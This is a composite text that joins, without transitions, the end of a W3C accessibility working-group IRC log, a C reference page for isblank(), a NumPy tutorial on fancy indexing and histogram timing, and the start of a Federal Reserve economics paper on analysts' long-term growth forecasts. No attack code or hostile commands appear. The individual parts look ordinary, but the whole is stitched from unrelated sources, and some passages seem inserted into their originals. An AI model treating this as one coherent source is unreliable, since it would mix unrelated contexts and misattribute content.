js might be a general thing about link text or several places in gateway to talk about. but, don't think we're all operating under the same assumptions wrt gateway.
14:30:34 [Michael]
ack David
14:30:35 [wendy]
s/gateway/granularity
14:31:11 [wendy]
mc a gateway tech to talk about clear link text. in html: when creating area, "follow this gateway technique"
14:31:41 [wendy]
dmd some people only read techniques. it puts a burden on us to make the integration in such a way that they get the interconnections or lose things in the shuffle.
14:31:54 [wendy]
dmd be careful when moving critical information to the gateway.
14:32:17 [wendy]
js how do we deal with things where multiple technologies are involved or required to make one thing happen.
14:32:35 [wendy]
js easy to imagine things where to do something you need html, css, and scripting at a minimum.
14:32:48 [wendy]
js since those live in different documents, how make sure they all get pulled together?
14:32:55 [wendy]
js e.g., zooming images.
14:33:23 [wendy]
js for 1.3, showing the structure of graphical material, can do that in svg. zooming would allow you to get at the detail.
14:34:45 [wendy]
ls xsl can pull in different documents, it can be an entry point and apply diff xsl.
14:35:08 [wendy]
mc can make the connections in the xml documents, less clear on how to present to people.
14:37:06 [wendy]
wac think some of this will be tied together in the scripting techniques. matt may recruited several scripting people to the mailing list. has promised a first internal draft by 10 sept.
14:37:48 [wendy]
mc for other of chris' submissions, some were obviously/easy to make into techniques. others were related to wcag 1.0 guidelines. some i combined concepts.
14:38:06 [wendy]
mc e.g., "make sure plug-ins are directly accessible" same with color and flicker.
14:38:23 [wendy]
mc those will need to point to guidelines or gateway techniques
14:39:05 [wendy]
mc html techs can't say too much about plug-ins, because they are not html.
14:39:16 [wendy]
js perhaps this is where the gateway can pull together? it can talk about plug-ins
14:39:36 [wendy]
js gateway can say, this (html) is not sufficient on its own
14:40:06 [wendy]
wac then in resources, point to flash or java techniques (at macromedia or sun or ibm)
14:41:26 [wendy]
wac similar issue with multimedia. in gateway we'll say that captions need to be provided, but point off to real/quicktime/smil etc for *how* to provide the captions.
14:41:35 [wendy]
js then there are issues with the player themselves.
14:41:49 [wendy]
mc our techniques have to speak to ways that do work
14:42:07 [wendy]
mc w/applets, say "better to use plug-in than applet viewer" where do we say that?
14:43:38 [wendy]
wac display user agent data in gateway or html techs? perhaps both
14:43:47 [wendy]
mc "plug-ins" only apply to html?
14:44:05 [wendy]
wac mixed namespaces, not sure called "plug-in" but need code that can interpret
14:44:18 [wendy]
js 508 says "if need 3rd party s/w to render..." provide a link
14:44:30 [wendy]
mc jw has talked about "accessible viewer"
14:44:43 [wendy]
mc decided not to bump plug-ins off my plate, but may bump parts to gateway
14:45:27 [wendy]
mc combined 4 techniques about presentational elements (b, i, basefont, font). propose that we add those to a list of html elements that should be replaced with css.
14:45:44 [wendy]
mc an existing technique, but no list of elements yet. propose these are the beginning of the list.
14:46:14 [wendy]
mc "title attribute for object" - my feeling, we dont' make title mandatory for most elements, therefore shouldn't do it here.
14:46:33 [wendy]
cr i wll send a message to the list. need to figure out where that one came from.
14:46:37 [wendy]
#915
14:47:18 [wendy]
mc "mandatory h1" - require that the first heading on a page be an h1. this is used in the french accessibility guidelines. unsure if wcag would require.
14:47:54 [wendy]
mc several approaches: 1. don't require 2. if using headings, start with h1 3. if require, then also require that be the first one on the page 4. or only that it is is present
14:48:18 [wendy]
mc could have h2 indicating navigation then h1 in the body
14:48:24 [wendy]
mc therefore, not always first one
14:48:57 [wendy]
ls document could be part of set of documents
14:49:12 [wendy]
mc if requiring h1s, require only one or are multiple ok?
14:49:27 [wendy]
ls if something is part of a book, could say "title page elsewhere"
14:51:30 [wendy]
14:52:15 [wendy]
14:55:45 [wendy]
14:56:07 [wendy]
in xhtml 2 use h/section
14:56:35 [wendy]
mc braillenet may use h1 to indicate start of content (i.e., when have h2 to indicate beginning of navigation)
15:01:06 [Zakim]
-Lisa_Seeman
15:01:32 [wendy]
on this call: agreement that most important is headings to be nested correctly, h1 is not required. it is on the list for discussion, but not a lot of support for it.
15:01:54 [Zakim]
+??P25
15:02:14 [wendy]
zakim, ??P25 is Lisa_Seeman
15:02:14 [Zakim]
+Lisa_Seeman; got it
15:02:33 [Becky]
I have to run to another meeting - bye
15:02:40 [wendy]
15:02:52 [Zakim]
-Becky_Gibson
15:02:54 [Zakim]
-John_Slatin
15:11:38 [ChrisR]
Test Suite:
15:14:52 [Michael]
action: Michael review test suite for language
15:16:47 [David_MacDonald]
David_MacDonald has joined #wai-wcag
15:17:40 [wendy]
cr proposes that the test suite should be normative
15:17:47 [wendy]
wac how often update for new techniques?
15:17:50 [wendy]
cr once a year
15:21:57 [wendy]
cr if its not normative, is there another status to give it?
15:22:22 [wendy]
ls such a restriction on creativity
15:22:49 [wendy]
wac realistic to update every year when has taken 6 to produce one normative document?
15:26:24 [wendy]
cr not meant to restrict people. you can't remove some of these things. meant to show that we know the best way to mark up tables (e.g.)
15:26:32 [wendy]
cr this is the minimum standard
15:26:38 [wendy]
cr it's base level accessibility
15:26:45 [wendy]
(for html)
15:27:34 [wendy]
cr want this to be strong and clear
15:28:23 [wendy]
ls have you looked at the work of task force 3 from EuroAccessibility?
15:28:32 [wendy]
ls they are defining methodologies for testing.
15:29:08 [wendy]
q+ to say "what about usability testing?"
15:31:32 [wendy]
zakim, who's making noise?
15:31:44 [Zakim]
wendy, listening for 10 seconds I heard sound from the following: Chris_Ridpath (9%), David_MacDonald (18%), Lisa_Seeman (96%)
15:31:50 [wendy]
zakim, mute David
15:31:50 [Zakim]
David_MacDonald should now be muted
15:31:55 [wendy]
zakim, unmute David
15:31:55 [Zakim]
David_MacDonald should no longer be muted
15:32:14 [Zakim]
-Takayuki_Watanabe
15:33:51 [Zakim]
-Lisa_Seeman
15:34:27 [Zakim]
+??P12
15:37:42 [wendy]
further discussion about normative or not. pros or cons.
15:38:53 [Michael]
action: Chris post link to test suite to list
15:40:35 [Zakim]
-Michael_Cooper
15:40:36 [Zakim]
-Alex_Li
15:40:37 [Zakim]
-Wendy
15:40:37 [ChrisR]
ChrisR has left #wai-wcag
15:40:38 [Zakim]
-Chris_Ridpath
15:40:39 [Zakim]
-??P12
15:40:40 [Zakim]
-Jenae_Andershonis
15:40:41 [Zakim]
-David_MacDonald
15:40:42 [Zakim]
WAI_WCAG(techniques)10:00AM has ended
15:40:43 [Zakim]
Attendees were Michael_Cooper, Chris_Ridpath, Alex_Li, David_MacDonald, Takayuki_Watanabe, Becky_Gibson, John_Slatin, Wendy, Jenae_Andershonis, Lisa_Seeman
15:41:00 [wendy]
RRSAgent, make log world
15:52:58 [nabe]
nabe has left #wai-wcag
16:31:37 [wendy]
zakim, bye
16:31:37 [Zakim]
Zakim has left #wai-wcag
16:31:41 [wendy]
RRSAgent, bye
16:31:41 [RRSAgent]
I see 3 open action items:
16:31:41 [RRSAgent]
ACTION: bg send proposal to list re: image replacement technique [1]
16:31:41 [RRSAgent]
recorded in
16:31:41 [RRSAgent]
ACTION: Michael review test suite for language [2]
16:31:41 [RRSAgent]
recorded in
16:31:41 [RRSAgent]
ACTION: Chris post link to test suite to list [3]
16:31:41 [RRSAgent]
recorded in
isblank()
Test a character to see if it's a blank character
Synopsis:
 #include <ctype.h>
 int isblank( int c );

Description:

The isblank() function tests the given character to see if it is a blank character. In the C locale, the set of blank characters consists of the space (' ') and the horizontal tab ('\t'). The isspace() function tests for a wider set of characters.
Returns:
Nonzero if c is a blank character; otherwise, zero.
Examples:
 #include <stdio.h>
 #include <stdlib.h>
 #include <ctype.h>

 char the_chars[] = { 'A', 0x09, ' ', 0x7d, '\n' };

 #define SIZE sizeof( the_chars ) / sizeof( char )

 int main( void )
 {
     int i;

     for( i = 0; i < SIZE; i++ ) {
         if( isblank( the_chars[i] ) ) {
             printf( "Char %c is a blank character\n", the_chars[i] );
         } else {
             printf( "Char %c is not a blank character\n", the_chars[i] );
         }
     }

     return EXIT_SUCCESS;
 }
This program produces the output:
 Char A is not a blank character
 Char   is a blank character
 Char   is a blank character
 Char } is not a blank character
 Char
  is not a blank character
Classification:
Last modified: 2014-06-24
Fancy indexing means passing an array of indices to access multiple array elements at once. This allows us to very quickly access and modify complicated subsets of an array's values.
import numpy as np
rand = np.random.RandomState(42)

x = rand.randint(100, size=10)
print(x)
[51 92 14 71 60 20 82 86 74 74]
Suppose we want to access three different elements. We could do it like this:
[x[3], x[7], x[2]]
[71, 86, 14]
Alternatively, we can pass a single list or array of indices to obtain the same result:
ind = [3, 7, 4]
x[ind]
array([71, 86, 60])
When using fancy indexing, the shape of the result reflects the shape of the index arrays rather than the shape of the array being indexed:
ind = np.array([[3, 7],
                [4, 5]])
x[ind]

array([[71, 86],
       [60, 20]])
Fancy indexing also works in multiple dimensions. Consider the following array:
X = np.arange(12).reshape((3, 4))
X

array([[ 0,  1,  2,  3],
       [ 4,  5,  6,  7],
       [ 8,  9, 10, 11]])
Like with standard indexing, the first index refers to the row, and the second to the column:
row = np.array([0, 1, 2])
col = np.array([2, 1, 3])
X[row, col]
array([ 2, 5, 11])
Notice that the first value in the result is X[0, 2], the second is X[1, 1], and the third is X[2, 3].
The pairing of indices in fancy indexing follows all the broadcasting rules that were mentioned in Computation on Arrays: Broadcasting.
So, for example, if we combine a column vector and a row vector within the indices, we get a two-dimensional result:
X[row[:, np.newaxis], col]
array([[ 2,  1,  3],
       [ 6,  5,  7],
       [10,  9, 11]])
Here, each row value is matched with each column vector, exactly as we saw in broadcasting of arithmetic operations. For example:
row[:, np.newaxis] * col
array([[0, 0, 0],
       [2, 1, 3],
       [4, 2, 6]])
It is always important to remember with fancy indexing that the return value reflects the broadcasted shape of the indices, rather than the shape of the array being indexed.
print(X)
[[ 0  1  2  3]
 [ 4  5  6  7]
 [ 8  9 10 11]]
We can combine fancy and simple indices:
X[2, [2, 0, 1]]
array([10, 8, 9])
We can also combine fancy indexing with slicing:
X[1:, [2, 0, 1]]
array([[ 6,  4,  5],
       [10,  8,  9]])
And we can combine fancy indexing with masking:
mask = np.array([1, 0, 1, 0], dtype=bool)
X[row[:, np.newaxis], mask]

array([[ 0,  2],
       [ 4,  6],
       [ 8, 10]])
All of these indexing options combined lead to a very flexible set of operations for accessing and modifying array values.
mean = [0, 0]
cov = [[1, 2],
       [2, 5]]
X = rand.multivariate_normal(mean, cov, 100)
X.shape
(100, 2)
Using the plotting tools we will discuss in Introduction to Matplotlib, we can visualize these points as a scatter-plot:
%matplotlib inline
import matplotlib.pyplot as plt
import seaborn; seaborn.set()  # for plot styling

plt.scatter(X[:, 0], X[:, 1]);
Let's use fancy indexing to select 20 random points. We'll do this by first choosing 20 random indices with no repeats, and use these indices to select a portion of the original array:
indices = np.random.choice(X.shape[0], 20, replace=False)
indices
array([93, 45, 73, 81, 50, 10, 98, 94, 4, 64, 65, 89, 47, 84, 82, 80, 25, 90, 63, 20])
selection = X[indices]  # fancy indexing here
selection.shape
(20, 2)
Now to see which points were selected, let's over-plot large circles at the locations of the selected points:
plt.scatter(X[:, 0], X[:, 1], alpha=0.3)
plt.scatter(selection[:, 0], selection[:, 1],
            facecolor='none', s=200);
This sort of strategy is often used to quickly partition datasets, as is often needed in train/test splitting for validation of statistical models (see Hyperparameters and Model Validation), and in sampling approaches to answering statistical questions.
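For instance, here is a minimal sketch of a random train/test split using fancy indexing (the 80/20 split is an arbitrary choice):

n_train = 80
perm = np.random.permutation(X.shape[0])
X_train, X_test = X[perm[:n_train]], X[perm[n_train:]]
print(X_train.shape, X_test.shape)   # (80, 2) (20, 2)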
x = np.arange(10)
i = np.array([2, 1, 8, 4])
x[i] = 99
print(x)
[ 0 99 99 3 99 5 6 7 99 9]
We can use any assignment-type operator for this. For example:
x[i] -= 10
print(x)
[ 0 89 89 3 89 5 6 7 89 9]
Notice, though, that repeated indices with these operations can cause some potentially unexpected results. Consider the following:
x = np.zeros(10)
x[[0, 0]] = [4, 6]
print(x)
[ 6. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
Where did the 4 go? The result of this operation is to first assign x[0] = 4, followed by x[0] = 6. The result, of course, is that x[0] contains the value 6.
Fair enough, but consider this operation:
i = [2, 3, 3, 4, 4, 4]
x[i] += 1
x
array([ 6., 0., 1., 1., 1., 0., 0., 0., 0., 0.])
You might expect that x[3] would contain the value 2, and x[4] would contain the value 3, as this is how many times each index is repeated. Why is this not the case?
Conceptually, this is because x[i] += 1 is meant as a shorthand for x[i] = x[i] + 1. The expression x[i] + 1 is evaluated once, and then the result is assigned to the indices in x.
With this in mind, it is not the augmentation that happens multiple times, but the assignment, which leads to the rather nonintuitive results.
So what if you want the other behavior, where the operation is repeated? For this, you can use the at() method of ufuncs (available since NumPy 1.8), and do the following:
x = np.zeros(10)
np.add.at(x, i, 1)
print(x)
[ 0. 0. 1. 2. 3. 0. 0. 0. 0. 0.]
The at() method does an in-place application of the given operator at the specified indices (here, i) with the specified value (here, 1).
Another method that is similar in spirit is the reduceat() method of ufuncs, which you can read about in the NumPy documentation.
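In brief, reduceat() performs reductions over the slices defined by consecutive indices; for example, this sums a[0:3], a[3:6], and a[6:]:

a = np.arange(10)
print(np.add.reduceat(a, [0, 3, 6]))   # [ 3 12 30]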
np.random.seed(42)
x = np.random.randn(100)

# compute a histogram by hand
bins = np.linspace(-5, 5, 20)
counts = np.zeros_like(bins)

# find the appropriate bin for each x
i = np.searchsorted(bins, x)

# add 1 to each of these bins
np.add.at(counts, i, 1)
The counts now reflect the number of points within each bin–in other words, a histogram:
# plot the results plt.plot(bins, counts, linestyle='steps');
Of course, it would be silly to have to do this each time you want to plot a histogram. This is why Matplotlib provides the plt.hist() routine, which does the same in a single line:
plt.hist(x, bins, histtype='step');
This function will create a nearly identical plot to the one seen here. To compute the binning, matplotlib uses the np.histogram function, which does a very similar computation to what we did before. Let's compare the two here:
print("NumPy routine:") %timeit counts, edges = np.histogram(x, bins) print("Custom routine:") %timeit np.add.at(counts, np.searchsorted(bins, x), 1)
NumPy routine:
10000 loops, best of 3: 97.6 µs per loop
Custom routine:
10000 loops, best of 3: 19.5 µs per loop
Our own one-line algorithm is several times faster than the optimized algorithm in NumPy! How can this be?
If you dig into the np.histogram source code (you can do this in IPython by typing np.histogram??), you'll see that it's quite a bit more involved than the simple search-and-count that we've done; this is because NumPy's algorithm is more flexible, and particularly is designed for better performance when the number of data points becomes large:
x = np.random.randn(1000000)

print("NumPy routine:")
%timeit counts, edges = np.histogram(x, bins)

print("Custom routine:")
%timeit np.add.at(counts, np.searchsorted(bins, x), 1)
NumPy routine:
10 loops, best of 3: 68.7 ms per loop
Custom routine:
10 loops, best of 3: 135 ms per loop
What this comparison shows is that algorithmic efficiency is almost never a simple question. An algorithm efficient for large datasets will not always be the best choice for small datasets, and vice versa (see Big-O Notation).
But the advantage of coding this algorithm yourself is that with an understanding of these basic methods, you could use these building blocks to extend this to do some very interesting custom behaviors.
The key to efficiently using Python in data-intensive applications is knowing about general convenience routines like np.histogram and when they're appropriate, but also knowing how to make use of lower-level functionality when you need more pointed behavior.
Steven A. Sharpe
Division of Research and Statistics
Federal Reserve Board
Washington, D.C. 20551
(202) 452-2875
ssharpe@frb.gov
April, 2004
Forthcoming in the Journal of Accounting, Auditing and Finance. The views expressed herein are those of the author and do not necessarily reflect the views of the Board nor the staff of the Federal Reserve System. I am grateful for comments and suggestions from Jason Cummins, Steve Oliner, and an anonymous referee, and members of the Capital Markets Section at the Board. Excellent research assistance was provided by Eric Richards and Dimitri Paliouras.
How Does the Market Interpret Analysts’ Long-term Growth Forecasts?
Abstract

This paper proposes an empirical valuation model in which linear regression can be used to deduce the horizon over which the market applies equity analysts' long-term growth forecasts. The model is estimated on industry- and sector-level portfolios of S&P 500 firms over 1983-2001. The estimated coefficients on consensus long-term growth forecasts suggest that the market applies these forecasts to an average horizon somewhere in the range of five to ten years.
1. Introduction

Long-term earnings growth forecasts by equity analysts have garnered increasing attention over the last several years, both in academic and practitioner circles. For instance, one of the more popular valuation yardsticks employed by investment professionals of late is the ratio of a company’s PE to its expected growth rate, where the latter is conventionally measured using analysts’ long-term earnings growth forecasts. An expanding body of academic research uses equity analysts’ earnings forecasts as well. One of the more common and important applications is the measurement of the equity risk premium; and, as Chan, Karceski and Lakonishok (2003) argue, analysts’ long-term forecasts are a “vital component” of such exercises. However, inferences from such studies can be quite sensitive to how those long-term growth forecasts are applied. Unfortunately, as evidenced by the range of assumptions employed in these applications, how these forecasts should be interpreted – that is, the horizon to which they ought to be applied – is quite ambiguous. For instance, Claus and Thomas (2001), in gauging the level of the equity risk premium, apply these growth forecasts to years 3 through 5; and beyond year 5 they apply a fixed growth rate assumption. At the other extreme, Harris and Marston (1992, 2001) and Khorana, Moyer and Patel (1999), apply these growth forecasts to an infinite horizon. In other studies, the assumed horizon usually falls somewhere in the middle.[1]

The implications are not purely academic, as these growth forecasts, or the perceptions they reflect, appear to have been a key factor driving equity market valuations skyward during the latter half of the 1990s. Indeed, as shown in figure 1, the PE ratio for the S&P500, the ratio of the index price to 12-month-ahead operating earnings, rose more than 50 percent between January 1994 and January 2000. Over roughly that same time period, the “bottom-up” (weighted average) long-term earnings growth forecast for the S&P500 climbed almost 4 percentage points to nearly 15 percent, well above previous peaks. Findings in Sharpe (2001) suggest this was no coincidence, that Wall Street’s long-term growth forecasts have been a significant factor in valuations; however, because of their relatively short history and high autocorrelation, the size of that influence is difficult to gauge in aggregate analysis.

[1] To estimate the intrinsic value of the companies in the Dow Jones Industrials Index, Lee, Myers and Swaminathan (1999) use the long-term earnings growth rate as a proxy for expected growth only through year 3. They implicitly pin down earnings growth beyond that point by assuming that the rate of return on equity reverts toward the industry median over time. Gebhardt, Lee and Swaminathan (2001) also use this formulation.

(Insert Figure 1)

In this study, I attempt to gauge the appropriate horizon over which to apply these growth forecasts by appealing to the market’s judgement, that is, by inferring the horizon from market prices. In particular, I propose a straightforward empirical valuation model in which linear regression can be used to deduce the forecast horizon that the “market” uses to value stocks. This model is a descendent of the Campbell and Shiller (1988, 1989) dividend-price ratio model, which is an approximation to the standard dividend-discount formula. As in Sharpe (2001), their model is modified in order to emphasize the expected dynamics of earnings rather than dividends. In the resulting framework, the horizon over which the market applies analysts’ long-term growth forecasts can be inferred from the elasticity of the PE ratio with respect to the growth forecast. I estimate the model using industry- and sector-level portfolios of S&P 500 firms, constructed from quarterly data on stock prices and consensus firm-level earnings forecasts over 1983-2001. The estimated coefficients on consensus long-term growth forecasts suggest that the market applies these forecasts to an average horizon somewhere in the range of 5 to 10 years. Thus, these growth forecasts are more important for valuation than assumed in the many applications that treat them as 3-to-5 year forecasts, though far less influential than forecasts of growth into perpetuity. Among other implications, the results suggest that the increase in S&P500 constituent growth forecasts during the second half of the 1990s can explain up to half of the concomitant rise in their PE ratios.
2. The Relation Between PE Ratios, Expected EPS Growth, and Payout Rates

2.1 The Basic Idea

The principal modeling goal is to develop a simple estimable model of the relationship between the price-earnings ratio and expected earnings growth. As discussed in the subsequent section, by expanding out terms in the model of Campbell and Shiller (1988), we can produce the following relation for any equity or portfolio of equities:

(1)   \log(P_t / EPS_{t+1}) = E_t \sum_{j=2}^{\infty} \rho^{j-1} g_{t+j} + Z_t

where P_t is the current stock price, EPS_{t+1} is expected earnings per share in the year ahead, and g_{t+j} is expected growth in earnings per share in year t+j. \rho is a constant slightly less than 1, similar to a discount factor, and Z_t is a function of the expected dividend payout rates and the required return. For the analysis that follows, divide the discounted sum of expected EPS growth rates into two pieces:

(2)   E_t \sum_{j=2}^{\infty} \rho^{j-1} g_{t+j} = \Big( \sum_{j=2}^{T} \rho^{j-1} \Big) g^L_t + \Big( \sum_{j=T+1}^{\infty} \rho^{j-1} \Big) g_{\infty}

where g^L_t represents the expected average EPS growth rate over the next T years, measured by analysts' long-term growth forecasts, and g_{\infty} is the average growth rate expected thereafter. This amounts to assuming there is a finite horizon, T, over which investors formulate their forecasts of earnings growth; beyond that horizon, expected average growth (g_{\infty}) is assumed constant or, at a minimum, uncorrelated with g^L. We thus rewrite (1) as follows:

(3)   \log(P_t / EPS_{t+1}) = \beta(T)\, g^L_t + Z_t(T)

where

\beta(T) = \sum_{j=1}^{T-1} \rho^j = \frac{\rho\,(1 - \rho^{T-1})}{1 - \rho}

and Z_t(T) now subsumes an additional (independent) term containing the growth rate expected after T. Clearly, the longer the horizon over which investors formulate "long-term" growth forecasts, the larger will be the "effect" on stock prices of any change in that expected (average) growth rate. For instance, suppose \rho = 0.96; if investors apply the forecast to a horizon running from year 1 through year 5 (growth in years 2, 3, 4, and 5), the multiplier on g^L is 3.6. If, instead, this horizon ran from year 1 through year 10, the multiplier would be 7.4. The main contribution of this paper is to infer this horizon by estimating this multiplier – the elasticity of the PE ratio with respect to the expected growth rate – in the context of the valuation model described more thoroughly below.
2.2 Derivation of the Empirical Model

Campbell and Shiller (1988) show that the log of the dividend-price ratio of a stock can be expressed as a linear function of forecasted one-period rates of return and forecasted one-period dividend growth rates; that is,

(4)   \log(D_t / P_t) = -\frac{k}{1-\rho} + E_t \sum_{j=1}^{\infty} \rho^{j-1} \,( r_{t+j} - \Delta d_{t+j} )

where D_t is dividends per share in the period ending at time t and P_t is the price of the stock at t. On the right hand side, E_t denotes investor expectations taken at time t, r_{t+j} is the return during period t+j, and \Delta d_{t+j} is dividend growth in t+j, calculated as the change in the log of dividends. \rho is a constant less than unity, and can be thought of as a pseudo-discount factor. Campbell and Shiller show that \rho is best approximated by the average value over the sample period of the ratio of the share price to the sum of the share price and the per share dividend, or P_t/(P_t + D_t). k is a constant that ensures the approximation holds exactly in the steady-state growth case. In that special case, where the expected rate of return and the dividend growth rate are constant, equation (4) collapses to the Gordon growth model: D_t/P_t = R − G.

The Campbell-Shiller dynamic growth model is convenient because it facilitates the use of linear regression for testing hypotheses. As pointed out by Nelson (1999), the Campbell-Shiller dividend-price ratio model can be reformulated by breaking the log dividends per share term into the sum of two terms – the log of earnings per share and the log of the dividend payout rate. When this is done and terms are rearranged, the Campbell-Shiller formulation can be rewritten as:

(5)   \log(P_t / EPS_t) = \frac{k}{1-\rho} + E_t \sum_{j=1}^{\infty} \rho^{j-1} \big[\, g_{t+j} + (1-\rho)\,\phi_{t+j} - r_{t+j} \,\big]

where EPS_t represents earnings per share in the period ending at t, g_{t+j} = \Delta \log EPS_{t+j}, or earnings per share growth in t+j, and \phi_{t+j} = \log(D_{t+j}/EPS_{t+j}), the log of the dividend payout rate in t+j. This reformulation is particularly convenient as it facilitates a focus on earnings growth.
To simplify and further focus data requirements on earnings forecasts (as opposed to dividend forecasts), I assume that the expected path of the payout ratio can be characterized by a simple dynamic process. In particular, reflecting the historical tendency of payout ratios to revert back toward their target levels subsequent to significant departures, I assume that investors forecast the (log) dividend payout ratio as a stationary first-order autoregressive process:

(6)   \phi_{t+1} = \phi_t + \lambda\,(\phi^* - \phi_t) + \epsilon_{t+1}

In words, the payout rate is expected to adjust toward some norm, \phi^*, at some speed \lambda < 1. It is straightforward to show that, given (6), the discounted sum of expected log payout ratios in (5) can be written as a linear function of the current payout rate:

(7)   (1-\rho)\, E_t \sum_{j=1}^{\infty} \rho^{j-1} \phi_{t+j} = \phi^* + \frac{(1-\rho)(1-\lambda)}{1-\rho(1-\lambda)}\,(\phi_t - \phi^*)

The final equation is arrived at by substituting into (5) the assumed structure of expected payout rates (7), and the assumed structure of earnings growth forecasts (2). Rearranging terms, and defining R_t as the discounted sum of expected returns, R_t \equiv E_t \sum_{j=1}^{\infty} \rho^{j-1} r_{t+j}:

(8)   \log(P_t / EPS_{t+1}) = \beta(T)\, g^L_t + \gamma\, \phi_t + c - R_t

where

\gamma = \frac{(1-\rho)(1-\lambda)}{1-\rho(1-\lambda)}

is between 0 and 1, and the constant c collects the terms involving \phi^* and g_{\infty}.
2.3 Empirical Implementation

To translate equation (8) into a regression equation with the log PE ratio as dependent variable, note that the first pair of right-hand side variables – the long-term growth forecast (g^L) and the current log dividend payout rate (\phi) – are observable, at least by proxy. The remaining terms, the expected "long-run" log payout ratio and expected earnings growth in the "out years," are unobservable and assumed constant; thus, they are absorbed into the regression constant. Even if constant over time, they are likely to vary cross-sectionally, which suggests the need for additional controls or industry dummies. Finally, expected future returns, R_t, are also unobservable. To control for time variation in expected returns, macroeconomic factors are added to the list of regressors. As discussed below, cross-sectional variation in expected returns is dealt with by including fixed effects. Letting i represent a firm or portfolio of firms, and letting Z represent proxies for, or factors in, expected returns, (8) is translated into the following regression equation:

(9)   \log(PE_{it}) = a_i + \beta\, g^L_{it} + \gamma\, \phi_{it} + \delta' Z_t + u_{it}

with u_{it} a mean-zero error term, assumed to be uncorrelated with the explanatory variables. Given an assumed value for \rho, the horizon over which investors apply analysts' long-term growth forecasts can be inferred from the magnitude of \beta, which should be positive. For these calculations I assume \rho = 0.96; in that case, if the long-term growth horizon applied to the five years of growth beginning at the end of the current year (T = 6), we would expect the coefficient on long-term growth to be 4.4. The resultant mapping from horizon T to implied coefficient is provided in the following table:
T        2      3      4      5      6      8      10     20     ∞
β(T)    0.96   1.9    2.8    3.6    4.4    6.0    7.4   12.9    24
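To make the mapping concrete, the short Python sketch below (my own, not part of the paper) computes the multiplier β(T) = Σ_{j=1}^{T-1} ρ^j and reproduces the table; in the empirical work, this mapping is inverted to read an implied horizon T off an estimated growth coefficient.

# Illustrative sketch (not from the original paper), assuming rho = 0.96.
def beta(T, rho=0.96):
    # Multiplier on g^L when the forecast covers growth in years 2 through T
    return sum(rho ** j for j in range(1, T))

for T in (2, 3, 4, 5, 6, 8, 10, 20):
    print(T, round(beta(T), 2))        # matches the table up to rounding

# As T grows without bound, beta(T) approaches rho / (1 - rho) = 24,
# the Gordon-growth (perpetuity) limit discussed next.
print(round(0.96 / (1 - 0.96)))        # 24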
To understand why the best approximation for \rho is P/(P+D), consider the case where g is the expected growth into perpetuity (T = ∞). In this case, the coefficient on g, according to (8), would boil down to simply \rho/(1−\rho) = P/D. But this is precisely the implied effect of growth on price in the Gordon (constant) growth model. Moreover, as long as the horizon is not extremely distant – the coefficient on g^L is not too large – the inferred horizon is not very sensitive to the precise choice of \rho.²

² For instance, if T = 6, then the coefficient (\beta) is predicted to be 4.3 for \rho = 0.95 versus 4.6 for \rho = 0.97.

According to the model (8), the coefficient on the dividend payout rate should lie between 0 and 1. It would equal 1 if the current payout rate was expected to be maintained forever (\lambda = 0); in most cases it should be much closer to zero than 1, even if the dividend payout rate is expected to revert quite slowly back to the long-run payout rate. For instance, if \lambda = 0.1 (the payout rate is adjusted annually by 10 percent of the gap between the desired and current level), then the theoretical coefficient on the payout rate (given \rho = 0.96) would be 0.27.

Clearly, the assumed dynamics of the payout rate are a simplification. It is quite plausible, for instance, that the long-run target for any given industry evolves over time. If that were the case, then we would expect the current payout rate to carry more information about the average future payout; thus, its coefficient would be larger than what is implied by short-run autocorrelations, and we would interpret it somewhat differently. However, this would not alter our interpretation of the coefficient on the growth forecast. Indeed, excluding the payout rate from the regression or adding another lag does not substantially alter inferences drawn with regard to the growth horizon.

As in much of the research on expected returns, estimation is conducted on portfolios of firms. One potential benefit of this aggregation is a reduction in potential measurement error that comes from using analysts' forecasts as proxies for long-term growth forecasts. But using portfolios is also necessary because model (8) cannot be applied literally to firms that do not have positive dividends and earnings, because the log payout ratio would be undefined. The model is too stylized for application to very immature firms. To some extent, this observation guides the choice of portfolio groupings. In particular, firms are grouped into portfolios by industry, rather than by characteristics that would be correlated with firm size or maturity.
3. Data and Sample Description

3.1 The data

The sample is constructed using monthly survey data on equity analyst earnings forecasts and historical annual operating earnings, both obtained from I/B/E/S International. A dataset of quarterly stock prices and earnings forecasts is constructed using the observations from the middle month of each quarter (February, May, August, and November), beginning in 1983, when long-term growth forecasts first become widely available in the I/B/E/S database. The sample in each quarter is built using firms belonging to the S&P500 at the time. Sample firms must also have consensus forecasts for earnings per share in the current fiscal year (EPS1) and the following fiscal year (EPS2), as well as a consensus long-term growth forecast. Data on dividends per share are mostly drawn from the historical I/B/E/S tape, though missing values in the early part of the sample are filled in using Compustat.

The data of greatest interest in this study are the equity analysts' long-term growth forecasts, which I measure using the median analyst forecast from I/B/E/S, where the typical forecast represents the "expected annual increase in operating earnings over the company's next full business cycle." In general, these forecasts refer to a period of between three to five years (I/B/E/S International, 1999). Clearly, this description is fairly ambiguous about the horizon of these forecasts, though three to five years is probably the most widely cited horizon.

The measure of expected earnings used for the denominator of the PE ratio is constructed using forecasts for both current-year and next-year earnings. For any given observation, a firm's "12-month-ahead" earnings per share is EPS_t = w_m·EPS1 + (1−w_m)·EPS2, where the weight (w_m) on current-year EPS is proportional to the fraction of the current year that remains. For instance, w_m is 1 if the firm just reported its previous fiscal-year earnings within the past month, and it equals 11/12 if the firm reported its previous year's earnings one month ago. The PE ratio is then calculated as the ratio of the current price to 12-month-ahead earnings.

To construct the lagged dividend payout ratio, I create an analogous measure of 12-month lagging earnings. Specifically, 12-month lagging earnings is EPS_{t−1} = w_m·EPS0 + (1−w_m)·EPS1, where EPS0 is earnings per share reported for the previous fiscal year. The dividend payout rate is then calculated as the ratio of the firm's most recent (annualized) dividend per share to its 12-month lagging operating earnings per share. Prior to 1985, the dividend variable is not provided in the I/B/E/S data. For these observations, the dividend per share value is taken from Compustat.
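As a concrete illustration of this splice, here is a small Python sketch (my own; the numerical inputs are hypothetical):

# Illustrative only: the 12-month-ahead and 12-month-lagging EPS splices.
# months_since_report = how long ago the previous fiscal year was reported.

def eps_12m_ahead(eps1, eps2, months_since_report):
    w = (12 - months_since_report) / 12.0   # weight on current-year forecast
    return w * eps1 + (1 - w) * eps2

def eps_12m_lagging(eps0, eps1, months_since_report):
    w = (12 - months_since_report) / 12.0
    return w * eps0 + (1 - w) * eps1

# Hypothetical firm that reported a month ago, so w = 11/12:
pe = 30.00 / eps_12m_ahead(2.00, 2.20, 1)
payout = 1.00 / eps_12m_lagging(1.80, 2.00, 1)  # annualized DPS / lagging EPS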
3.2 Construction of Sector and Industry Portfolios

